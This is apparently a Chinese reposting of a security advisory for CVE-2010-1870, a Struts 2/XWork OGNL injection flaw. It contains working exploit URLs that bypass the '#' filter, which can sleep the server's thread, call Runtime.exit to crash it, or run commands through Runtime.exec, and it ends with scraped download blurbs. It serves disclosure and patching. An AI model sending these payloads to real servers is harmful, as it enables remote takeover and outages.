http://mydomain/MyStruts.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(d)(('@java.lang.Thread@sleep(60000)')(d))
线程休眠60s
http://www.nsfocus.net/vulndb/15431
发布日期:2010-07-09
更新日期:2010-07-15
受影响系统:
OpenSymphony XWork < 2.2.0
Apache Group Struts < 2.2.0
描述:
BUGTRAQ ID: 41592
CVE ID: CVE-2010-1870
XWork是一个命令模式框架,用于支持Struts 2及其他应用。
XWork处理用户请求参数数据时存在漏洞,远程攻击者可以利用此漏洞在系统上执行任意命令。
Struts2中WebWork框架使用XWork基于HTTP参数名执行操作和调用,将每个HTTP参数名处理为OGNL(对象图形导航语言)语句,而OGNL将:
user.address.city=Bishkek&user['favoriteDrink']=kumys
转换为:
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
这是通过ParametersInterceptor来执行的,使用用户提供的HTTP参数调用ValueStack.setValue()。
除了获取和设置属性外,OGNL还支持其他一些功能:
* 方法调用:foo()
* 静态方式调用: @java.lang.System@exit(1)
* 构建函数调用:new MyClass()
* 处理上下文变量:#foo = new MyClass()
由于HTTP参数名为OGNL语句,为了防范攻击者通过HTTP参数调用任意方式,XWork使用了以下两个变量保护方式的执行:
* OgnlContext的属性xwork.MethodAccessor.denyMethodExecution(默认设置为true)
* SecurityMemberAccess私有字段allowStaticMethodAccess(默认设置为false)
为了方便开发人员访问各种常用的对象,XWork提供了一些预定义的上下文变量:
* #application
* #session
* #request
* #parameters
* #attr
* #context
* #_memberAccess
* #root
* #this
* #_typeResolver
* #_classResolver
* #_traceEvaluations
* #_lastEvaluation
* #_keepLastEvaluation
这些变量代表各种服务器端对象。为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值:
#_memberAccess['allowStaticMethodAccess'] = true
#foo = new java .lang.Boolean("false")
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo
#rt = @java.lang.Runtime@getRuntime()
#rt.exec('mkdir /tmp/PWNED')
<*来源:Meder Kydyraliev (bugtraq@web.areopag.net)
链接:http://secunia.com/advisories/32495/
http://www.exploit-db.com/exploits/14360/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
建议:
厂商补丁:
Apache Group
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://svn.apache.org/viewvc?view=revision&revision=956389
分享到:
相关推荐
XWork处理用户请求参数数据时存在漏洞,远程攻击者可以利用此漏洞在系统上执行任意命令。 Struts2中WebWork框架使用XWork基于HTTP参数名执行操作和调用,将每个HTTP参数名处理为OGNL(对象图形导航语言)语句,而...
xwork帮助文档
Apache的Struts2框架最近出了一个很严重的漏洞,可以直接执行系统命令 http://www.163.com?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27...
struts2 之xwork源码 供学习Struts2和Xwork的朋友使用
2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-...
最新版本的Struts2.2.3 以及Xwork的帮助文档
struts2下的xwork源码 学习源代码,掌握struts2原理
struts2.1 xwork2.1帮助文档 java帮助文档
最全的struts2.3和xwork2.chm中文帮助文档
这个压缩包包含struts-xwork-core的src源码,导入eclipse即可。
struts2 xwork源文件, 可以在ECLIPSE中导入这些以便和相应的CLASS文件建立映射,利于开发
Struts2中xwork源码,希望对你们有所帮助。
struts-2.3.16.1-all API xwork-core core
struts2 xwork-core 类图 chm
struts2下的Xwork2源文件 在 opensymphony开源社区http://www.opensymphony.com/ 可匿名使用SVN checkout xwork2的源代码 http://svn.opensymphony.com/svn/xwork/trunk
Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档 Struts2.2.3 + xwork半中文帮助文档
Struts2中xwork的源代码,学习Struts2的朋友一定要看看
struts2_xwork2下载 http://struts.apache.org/2.0.14/index.html http://www.opensymphony.com/xwork/download.action
struts 2 中的xwork.rar源代码